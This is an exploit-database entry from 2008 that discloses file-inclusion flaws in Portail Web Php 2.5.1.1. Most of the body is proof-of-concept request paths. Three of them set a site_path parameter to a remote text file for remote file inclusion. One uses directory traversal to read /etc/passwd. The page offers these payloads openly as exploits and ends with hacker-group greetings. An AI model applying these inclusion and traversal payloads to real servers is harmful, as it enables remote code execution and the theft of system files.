Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities
# Published : 2008-02-24
# Author : GoLd_M
# Previous Title : phpUserBase 1.3b (unverified.inc.php) Remote File Inclusion Vulnerability
# Next Title : php Download Manager <= 1.1 Local File Inclusion Vulnerability

### Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities
### http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar
### POC :
### I- Remote File Inclusion
### /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt
### II- Local File Inclusion
### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd
### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali  :) 

# www.Syue.com [2008-02-24]